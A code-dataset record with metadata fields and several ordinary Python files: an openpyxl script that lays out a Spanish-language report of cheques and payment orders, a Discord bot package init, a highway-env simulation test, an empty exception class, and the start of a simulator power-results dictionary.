| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.8
| 1
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
5c6c0fbb192964514a73f3f96708e09288d0f48b
| 21,542
|
py
|
Python
|
hanibal/ans_reporte/crear_informe_orden_pago_excel.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_reporte/crear_informe_orden_pago_excel.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_reporte/crear_informe_orden_pago_excel.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
import openpyxl
from openpyxl import Workbook
import openpyxl.worksheet
import unicodedata
from copy import deepcopy
from openpyxl.chart import (
Reference,
Series,
BarChart
)
from openpyxl.chart.marker import DataPoint
from openpyxl.drawing.fill import PatternFillProperties, ColorChoice
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font
from openpyxl.styles.borders import Border, Side
from openpyxl.drawing.image import Image
from datetime import datetime, date, timedelta
import time
import locale
global root
def crear_wb_informe():
wb = openpyxl.Workbook()
return wb
def unicodeText(text):
try:
text = unicodedata.unicode(text, 'utf-8')
except TypeError:
return text
def crea_hoja_info(wb, title, flag):
sheet = wb.active
if(flag == 0):
#sheet.page_setup.paperSize = sheet.PAPERSIZE_A4_SMALL
#sheet.print_options.scale = 100
sheet.page_margins.left = 0.1
sheet.page_margins.right = 0.1
sheet.page_margins.top = 0.5
sheet.page_margins.bottom = 0.5
#sheet.page_setup.orientation = sheet.ORIENTATION_PORTRAIT
#sheet.sheet_properties.pageSetUpPr.fitToPage = True
sheet.page_setup.fitToWidht = False
#sheet.print_options.horizontalCentered = True
if(flag == 1):
#sheet.page_setup.paperSize = sheet.PAPERSIZE_A4_SMALL
#sheet.print_options.scale = 100
#sheet.sheet_properties.pageSetUpPr.fitToPage = True
sheet.page_setup.fitToWidth = False
sheet.page_margins.left = 0.1
sheet.page_margins.right = 0.1
sheet.page_margins.top = 0.5
sheet.page_margins.bottom = 0.5
#sheet.page_setup.orientation = sheet.ORIENTATION_PORTRAIT
#sheet.print_options.horizontalCentered = True
sheet.title = title
return sheet
def crea_hoja_info_pdf(wb, title, flag):
sheet = wb.active
if(flag == 0):
#sheet.page_setup.paperSize = sheet.PAPERSIZE_A4_SMALL
#sheet.print_options.scale = 100
sheet.page_margins.left = 0.1
sheet.page_margins.right = 0.1
sheet.page_margins.top = 0.5
sheet.page_margins.bottom = 0.5
#sheet.page_setup.orientation = sheet.ORIENTATION_PORTRAIT
#sheet.sheet_properties.pageSetUpPr.fitToPage = True
sheet.page_setup.fitToWidht = False
#sheet.print_options.horizontalCentered = True
if(flag == 1):
#sheet.page_setup.paperSize = sheet.PAPERSIZE_A4_SMALL
#sheet.print_options.scale = 100
#sheet.sheet_properties.pageSetUpPr.fitToPage = True
sheet.page_setup.fitToWidth = False
sheet.page_margins.left = 0.1
sheet.page_margins.right = 0.1
sheet.page_margins.top = 0.5
sheet.page_margins.bottom = 0.5
#sheet.page_setup.orientation = sheet.ORIENTATION_PORTRAIT
#sheet.print_options.horizontalCentered = True
sheet.title = title
return sheet
def border_tabla(sheet, col, colfin, fil, filfin, styleleft, styletop, styleright, stylebottom):
colfin=colfin+1
filfin=filfin+2
border_cell = Border(left=Side(style=styleleft), top=Side(style=styletop), right=Side(style=styleright), bottom=Side(style=stylebottom))
for i in range(fil, filfin-1):
for j in range(col, colfin):
sheet.cell(row=i, column=j).border = border_cell
def columnas_filas(sheet, flag, celda, value):
if (flag == 0):
sheet.column_dimensions[celda].width = value
if (flag == 1):
sheet.row_dimensions[int(celda)].height = value
def poner_border(sheet, fil, col, styleleft, styletop, styleright, stylebottom):
border_cell = Border(left=Side(style=styleleft), top=Side(style=styletop), right=Side(style=styleright), bottom=Side(style=stylebottom))
sheet.cell(row=fil, column=col).border = border_cell
def Informe(sheet, dic,lista_alumnos,cant_alumno,filtro,filtro1):
columnas_filas(sheet, 0, 'A', 10.00)
columnas_filas(sheet, 0, 'B', 5.00)
columnas_filas(sheet, 0, 'C', 10.00)
columnas_filas(sheet, 0, 'D', 7.00)
columnas_filas(sheet, 0, 'E', 12.00)
columnas_filas(sheet, 0, 'F', 10.00)
columnas_filas(sheet, 0, 'G', 10.00)
columnas_filas(sheet, 0, 'H', 7.00)
columnas_filas(sheet, 0, 'I', 10.00)
alignment_title = Alignment(horizontal='center', vertical='center')
fuente = Font(bold=False, size=6, name='arial')
fuente3 = Font(bold=True, size=8, name='arial')
fuente2 = Font(bold=True, size=6, name='arial')
fila = 3
fila1 = 2
acum=1
cont=0
col=2
col1=4
fil=4
coli=2
colf=2
sheet.merge_cells('A2:I2')
sheet['A2'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
sheet['A2'].font = fuente3
sheet['A2']= 'Listado de Cheques y Ordenes de Pago'
sheet['H1'].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['H1'].font = fuente2
sheet['H1']= 'Usuario'
usuario_id=str(dic['usuario_id'].encode('utf-8'))
sheet['I1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['I1'].font = fuente
sheet['I1']= str(dic['usuario_id'].encode('utf-8'))
sheet['A1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A1'].font = fuente2
sheet['A1']= 'Compañia'
sheet.merge_cells('B1:C1')
sheet['B1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B1'].font = fuente
sheet['B1']= str(dic['company_id'].encode('utf-8'))
sheet['A4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A4'].font = fuente2
sheet['A4']= 'Fecha Emisión:'
#fecha_actual = datetime.strftime(datetime.now(), '%d-%m-%Y %H:%M:%S')
fecha_actual = dic['fecha_corte']
sheet.merge_cells('B4:C4')
sheet['B4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B4'].font = fuente
sheet['B4']= fecha_actual
sheet['A5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A5'].font = fuente2
sheet['A5']= 'Metodos de Pagos:'
sheet.merge_cells('B5:E5')
sheet['B5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B5'].font = fuente
if filtro==0:
sheet['B5']= "Todos los metodos de pagos"
else:
sheet['B5']= filtro
sheet['F5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F5'].font = fuente2
sheet['F5']= 'Estados de Pagos:'
sheet.merge_cells('G5:G5')
sheet['G5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G5'].font = fuente
if filtro1==0:
sheet['G5']= "Todos"
else:
sheet['G5']= filtro1
poner_border(sheet,1,1,'medium','medium','none','none')
poner_border(sheet,1,2,'none','medium','none','none')
poner_border(sheet,1,3,'none','medium','none','none')
poner_border(sheet,1,4,'none','medium','none','none')
poner_border(sheet,1,5,'none','medium','none','none')
poner_border(sheet,1,5,'none','medium','none','none')
poner_border(sheet,1,6,'none','medium','none','none')
poner_border(sheet,1,7,'none','medium','none','none')
poner_border(sheet,1,8,'none','medium','none','none')
poner_border(sheet,1,9,'none','medium','medium','none')
poner_border(sheet,2,1,'medium','none','none','none')
poner_border(sheet,2,9,'none','none','medium','none')
poner_border(sheet,3,1,'medium','none','none','medium')
poner_border(sheet,3,2,'none','none','none','medium')
poner_border(sheet,3,3,'none','none','none','medium')
poner_border(sheet,3,4,'none','none','none','medium')
poner_border(sheet,3,5,'none','none','none','medium')
poner_border(sheet,3,6,'none','none','none','medium')
poner_border(sheet,3,7,'none','none','none','medium')
poner_border(sheet,3,8,'none','none','none','medium')
poner_border(sheet,3,9,'none','none','medium','medium')
fecha_ini=dic['fecha_desde']
fecha_fin=dic['fecha_hasta']
fecha=str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
sheet.merge_cells('D3:F3')
sheet['D3'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
sheet['D3'].font = fuente2
sheet['D3']= str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
sheet['A6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A6'].font = fuente2
sheet['A6']= 'Fecha Emisión'
sheet.merge_cells('B6:C6')
sheet['B6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B6'].font = fuente2
sheet['B6']= 'Egreso #'
sheet.merge_cells('D6:E6')
sheet['D6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['D6'].font = fuente2
sheet['D6']= 'Cheque #'
sheet['F6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F6'].font = fuente2
sheet['F6']= 'Beneficiario'
sheet.merge_cells('G6:H6')
sheet['G6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G6'].font = fuente2
sheet['G6']= 'Observación'
sheet['I6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['I6'].font = fuente2
sheet['I6']= 'Valor'
fila=7
total_general=0.0
saldo_general=0.0
saldo=0.0
total=0.0
dic={}
lista_datos=[]
for recorrer in lista_alumnos:
sheet['A'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A'+str(fila)].font = fuente
sheet['A'+str(fila)]= recorrer['fecha_emision']
#poner_border(sheet,fila,1,'none','none','none','medium')
sheet.merge_cells('B'+str(fila)+':C'+str(fila))
sheet['B'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B'+str(fila)].font = fuente
if recorrer['egreso']==0:
sheet['B'+str(fila)]= ""
else:
sheet['B'+str(fila)]= recorrer['egreso']
sheet.merge_cells('D'+str(fila)+':E'+str(fila))
sheet['D'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['D'+str(fila)].font = fuente
if recorrer['cheque']==0:
sheet['D'+str(fila)]= ""
else:
sheet['D'+str(fila)]= recorrer['cheque']
sheet['F'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F'+str(fila)].font = fuente
sheet['F'+str(fila)]= recorrer['beneficiario']
sheet.merge_cells('G'+str(fila)+':H'+str(fila))
sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G'+str(fila)].font = fuente
if recorrer['observacion']==0:
sheet['G'+str(fila)]= ""
else:
sheet['G'+str(fila)]= recorrer['observacion']
sheet['I'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['I'+str(fila)].font = fuente
sheet['I'+str(fila)]= "{:,}".format(float(recorrer['valor'])).replace(',','~').replace('.',',').replace('~','.')
total_general=total_general+float(recorrer['valor'])
fila=fila+1
sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G'+str(fila)].font = fuente2
sheet['G'+str(fila)]= 'TOTAL'
sheet.merge_cells('H'+str(fila)+':I'+str(fila))
sheet['H'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['H'+str(fila)].font = fuente2
sheet['H'+str(fila)]= "{:,}".format(float(total_general)).replace(',','~').replace('.',',').replace('~','.')
columnas_filas(sheet, 1, str(fila+5), 10.00)
sheet.merge_cells('D'+str(fila+5)+':F'+str(fila+5))
sheet['D'+str(fila+5)].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='center')
sheet['D'+str(fila+5)].font = fuente2
sheet['D'+str(fila+5)]= usuario_id
poner_border(sheet,fila+5,4,'none','thin','none','none')
poner_border(sheet,fila+5,5,'none','thin','none','none')
poner_border(sheet,fila+5,6,'none','thin','none','none')
def Informe_pdf(sheet, dic,lista_alumnos,cant_alumno,filtro,filtro1):
columnas_filas(sheet, 0, 'A', 10.00)
columnas_filas(sheet, 0, 'B', 5.00)
columnas_filas(sheet, 0, 'C', 10.00)
columnas_filas(sheet, 0, 'D', 7.00)
columnas_filas(sheet, 0, 'E', 1.00)
columnas_filas(sheet, 0, 'F', 12.00)
columnas_filas(sheet, 0, 'G', 10.00)
columnas_filas(sheet, 0, 'H', 10.00)
columnas_filas(sheet, 0, 'I', 7.00)
columnas_filas(sheet, 0, 'J', 10.00)
alignment_title = Alignment(horizontal='center', vertical='center')
fuente = Font(bold=False, size=6, name='arial')
fuente3 = Font(bold=True, size=8, name='arial')
fuente2 = Font(bold=True, size=6, name='arial')
fila = 3
fila1 = 2
acum=1
cont=0
col=2
col1=4
fil=4
coli=2
colf=2
sheet.merge_cells('A2:I2')
sheet['A2'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
sheet['A2'].font = fuente3
sheet['A2']= 'Listado de Cheques y Ordenes de Pago'
sheet['H1'].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['H1'].font = fuente2
sheet['H1']= 'Usuario'
usuario_id=str(dic['usuario_id'].encode('utf-8'))
sheet['I1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['I1'].font = fuente
sheet['I1']= str(dic['usuario_id'].encode('utf-8'))
sheet['A1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A1'].font = fuente2
sheet['A1']= 'Compañia'
sheet.merge_cells('B1:C1')
sheet['B1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B1'].font = fuente
sheet['B1']= str(dic['company_id'].encode('utf-8'))
sheet['A4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A4'].font = fuente2
sheet['A4']= 'Fecha Emisión:'
#fecha_actual = datetime.strftime(datetime.now(), '%d-%m-%Y %H:%M:%S')
fecha_actual = dic['fecha_corte']
sheet.merge_cells('B4:C4')
sheet['B4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B4'].font = fuente
sheet['B4']= fecha_actual
sheet['A5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A5'].font = fuente2
sheet['A5']= 'Metodos de Pagos:'
sheet.merge_cells('B5:E5')
sheet['B5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B5'].font = fuente
if filtro==0:
sheet['B5']= "Todos los metodos de pagos"
else:
sheet['B5']= filtro
sheet['F5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F5'].font = fuente2
sheet['F5']= 'Estados de Pagos:'
sheet.merge_cells('G5:G5')
sheet['G5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G5'].font = fuente
if filtro1==0:
sheet['G5']= "Todos"
else:
sheet['G5']= filtro1
poner_border(sheet,1,1,'medium','medium','none','none')
poner_border(sheet,1,2,'none','medium','none','none')
poner_border(sheet,1,3,'none','medium','none','none')
poner_border(sheet,1,4,'none','medium','none','none')
poner_border(sheet,1,5,'none','medium','none','none')
poner_border(sheet,1,5,'none','medium','none','none')
poner_border(sheet,1,6,'none','medium','none','none')
poner_border(sheet,1,7,'none','medium','none','none')
poner_border(sheet,1,8,'none','medium','none','none')
poner_border(sheet,1,9,'none','medium','medium','none')
poner_border(sheet,2,1,'medium','none','none','none')
poner_border(sheet,2,9,'none','none','medium','none')
poner_border(sheet,3,1,'medium','none','none','medium')
poner_border(sheet,3,2,'none','none','none','medium')
poner_border(sheet,3,3,'none','none','none','medium')
poner_border(sheet,3,4,'none','none','none','medium')
poner_border(sheet,3,5,'none','none','none','medium')
poner_border(sheet,3,6,'none','none','none','medium')
poner_border(sheet,3,7,'none','none','none','medium')
poner_border(sheet,3,8,'none','none','none','medium')
poner_border(sheet,3,9,'none','none','medium','medium')
fecha_ini=dic['fecha_desde']
fecha_fin=dic['fecha_hasta']
fecha=str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
sheet.merge_cells('D3:F3')
sheet['D3'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
sheet['D3'].font = fuente2
sheet['D3']= str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
sheet['A6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A6'].font = fuente2
sheet['A6']= 'Fecha Emisión'
sheet.merge_cells('B6:C6')
sheet['B6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B6'].font = fuente2
sheet['B6']= 'Egreso #'
sheet.merge_cells('D6:E6')
sheet['D6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['D6'].font = fuente2
sheet['D6']= 'Cheque #'
sheet['F6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F6'].font = fuente2
sheet['F6']= 'Beneficiario'
sheet.merge_cells('G6:H6')
sheet['G6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G6'].font = fuente2
sheet['G6']= 'Observación'
sheet['I6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['I6'].font = fuente2
sheet['I6']= 'Valor'
fila=7
total_general=0.0
saldo_general=0.0
saldo=0.0
total=0.0
dic={}
lista_datos=[]
for recorrer in lista_alumnos:
sheet['A'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A'+str(fila)].font = fuente
sheet['A'+str(fila)]= recorrer['fecha_emision']
#poner_border(sheet,fila,1,'none','none','none','medium')
sheet.merge_cells('B'+str(fila)+':C'+str(fila))
sheet['B'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B'+str(fila)].font = fuente
if recorrer['egreso']==0:
sheet['B'+str(fila)]= ""
else:
sheet['B'+str(fila)]= recorrer['egreso']
sheet.merge_cells('D'+str(fila)+':E'+str(fila))
sheet['D'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['D'+str(fila)].font = fuente
if recorrer['cheque']==0:
sheet['D'+str(fila)]= ""
else:
sheet['D'+str(fila)]= recorrer['cheque']
sheet['F'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F'+str(fila)].font = fuente
sheet['F'+str(fila)]= recorrer['beneficiario']
sheet.merge_cells('G'+str(fila)+':H'+str(fila))
sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G'+str(fila)].font = fuente
if recorrer['observacion']==0:
sheet['G'+str(fila)]= ""
else:
sheet['G'+str(fila)]= recorrer['observacion']
sheet['I'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['I'+str(fila)].font = fuente
sheet['I'+str(fila)]= "{:,}".format(float(recorrer['valor'])).replace(',','~').replace('.',',').replace('~','.')
total_general=total_general+float(recorrer['valor'])
fila=fila+1
sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G'+str(fila)].font = fuente2
sheet['G'+str(fila)]= 'TOTAL'
sheet.merge_cells('H'+str(fila)+':I'+str(fila))
sheet['H'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['H'+str(fila)].font = fuente2
sheet['H'+str(fila)]= "{:,}".format(float(total_general)).replace(',','~').replace('.',',').replace('~','.')
columnas_filas(sheet, 1, str(fila+5), 10.00)
sheet.merge_cells('D'+str(fila+5)+':F'+str(fila+5))
sheet['D'+str(fila+5)].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='center')
sheet['D'+str(fila+5)].font = fuente2
sheet['D'+str(fila+5)]= usuario_id
poner_border(sheet,fila+5,4,'none','thin','none','none')
poner_border(sheet,fila+5,5,'none','thin','none','none')
poner_border(sheet,fila+5,6,'none','thin','none','none')
| 40.492481
| 140
| 0.642977
| 2,910
| 21,542
| 4.664261
| 0.078351
| 0.04229
| 0.091505
| 0.107419
| 0.92102
| 0.92102
| 0.912252
| 0.912252
| 0.912252
| 0.912252
| 0
| 0.028911
| 0.163448
| 21,542
| 531
| 141
| 40.568738
| 0.724266
| 0.056587
| 0
| 0.881517
| 0
| 0
| 0.130955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021327
| false
| 0
| 0.035545
| 0
| 0.066351
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a37c50e10d0df75ac16aa637a34d516b3dd4403
| 120
|
py
|
Python
|
olpxek_bot/cogs/__init__.py
|
kexplo/olpxek-bot
|
d4ec11d97ea906651a2df225081f33a235e9bd65
|
[
"MIT"
] | 7
|
2020-08-18T22:07:24.000Z
|
2022-01-01T07:32:20.000Z
|
olpxek_bot/cogs/__init__.py
|
kexplo/olpxek_bot
|
2fe5352ab1e584f877ba5445ff5af2d179c9b2c8
|
[
"MIT"
] | null | null | null |
olpxek_bot/cogs/__init__.py
|
kexplo/olpxek_bot
|
2fe5352ab1e584f877ba5445ff5af2d179c9b2c8
|
[
"MIT"
] | null | null | null |
from olpxek_bot.cogs.finance import FinanceCog
from olpxek_bot.cogs.py import PyCog
__all__ = ["FinanceCog", "PyCog"]
| 20
| 46
| 0.783333
| 17
| 120
| 5.176471
| 0.588235
| 0.227273
| 0.295455
| 0.386364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 120
| 5
| 47
| 24
| 0.830189
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a8163b45e947b87b03c39c6279a130a163164b7
| 1,608
|
py
|
Python
|
lx_test/test_data.py
|
lxjlu/highway-env
|
b360ed3f4f7fca950294c82b04c55464624d5626
|
[
"MIT"
] | null | null | null |
lx_test/test_data.py
|
lxjlu/highway-env
|
b360ed3f4f7fca950294c82b04c55464624d5626
|
[
"MIT"
] | null | null | null |
lx_test/test_data.py
|
lxjlu/highway-env
|
b360ed3f4f7fca950294c82b04c55464624d5626
|
[
"MIT"
] | null | null | null |
import gym
import highway_env
import time
import pprint
import matplotlib.pyplot as plt
"""
# 直线
v_lane_id = ("a", "b", 1)
v_target_id = ("a", "b", 0)
x = 100.0
y = 0.0
h = 0.0
s = 10.0
target_s = 20.0
env = gym.make("myenv-c1-v0")
env.config["v_lane_id"] = v_lane_id
env.config["v_target_id"] = v_target_id
env.config["v_x"] = x
env.config["v_y"] = y
env.config["v_h"] = h
env.config["v_s"] = s
env.config["v_target_s"] = target_s
env.config["KP_HEADING"] = 1
env.config["KP_LATERAL"] = 0.8
env.reset()
env.vehicle.TAU_PURSUIT = env.config["TAU_PURSUIT"]
env.vehicle.KP_LATERAL = env.config["KP_LATERAL"]
env.vehicle.KP_A = env.config["KP_A"]
env.vehicle.KP_HEADING = env.config["KP_HEADING"]
for _ in range(50):
action = 1
env.step(action)
env.render()
time.sleep(0.5)
env.close()
"""
v_lane_id = ("a", "b", 1)
v_target_id = ("a", "b", 0)
x = 100.0
y = 0.0
h = 0.0
s = 10.0
target_s = 20.0
env = gym.make("myenv-c3-v0")
env.config["real_time_rendering"] = True
env.config["scaling"] = 6
env.config["v_lane_id"] = v_lane_id
env.config["v_target_id"] = v_target_id
env.config["v_x"] = x
env.config["v_y"] = y
env.config["v_h"] = h
env.config["v_s"] = s
env.config["v_target_s"] = target_s
env.config["KP_HEADING"] = 5
env.config["KP_LATERAL"] = 5
env.config["TAU_PURSUIT"] = 0.1
env.reset()
env.vehicle.TAU_PURSUIT = env.config["TAU_PURSUIT"]
env.vehicle.KP_LATERAL = env.config["KP_LATERAL"]
env.vehicle.KP_A = env.config["KP_A"]
env.vehicle.KP_HEADING = env.config["KP_HEADING"]
for _ in range(50):
action = 1
env.step(action)
env.render()
# time.sleep(0.5)
env.close()
| 22.333333
| 51
| 0.668532
| 308
| 1,608
| 3.275974
| 0.178571
| 0.258672
| 0.138751
| 0.047572
| 0.808722
| 0.808722
| 0.808722
| 0.808722
| 0.808722
| 0.808722
| 0
| 0.038905
| 0.136816
| 1,608
| 71
| 52
| 22.647887
| 0.68804
| 0.009328
| 0
| 0
| 0
| 0
| 0.170286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.028571
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8fb0b79b8c69cb4e341e064aaeb00d8905f30df2
| 125
|
py
|
Python
|
exception/argument_not_instance_of_exception.py
|
joaoteixeira88/pyguard
|
e9bdcb58034fd0db254121f71ac9bd76c7dec973
|
[
"MIT"
] | 2
|
2021-03-11T22:09:40.000Z
|
2022-01-09T16:16:43.000Z
|
exception/argument_not_instance_of_exception.py
|
joaoteixeira88/pyguard
|
e9bdcb58034fd0db254121f71ac9bd76c7dec973
|
[
"MIT"
] | 3
|
2021-03-11T08:20:43.000Z
|
2021-03-30T07:34:38.000Z
|
exception/argument_not_instance_of_exception.py
|
joaoteixeira88/python-guard
|
e9bdcb58034fd0db254121f71ac9bd76c7dec973
|
[
"MIT"
] | null | null | null |
from exception.base_exception import BaseGuardException
class ArgumentNotInstanceOfException(BaseGuardException):
pass
| 20.833333
| 57
| 0.864
| 10
| 125
| 10.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104
| 125
| 5
| 58
| 25
| 0.955357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
8ff4604fc29bc4f2e89f58b37098b2cb0aeb5085
| 68,496
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_bzip2/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_bzip2/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_bzip2/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
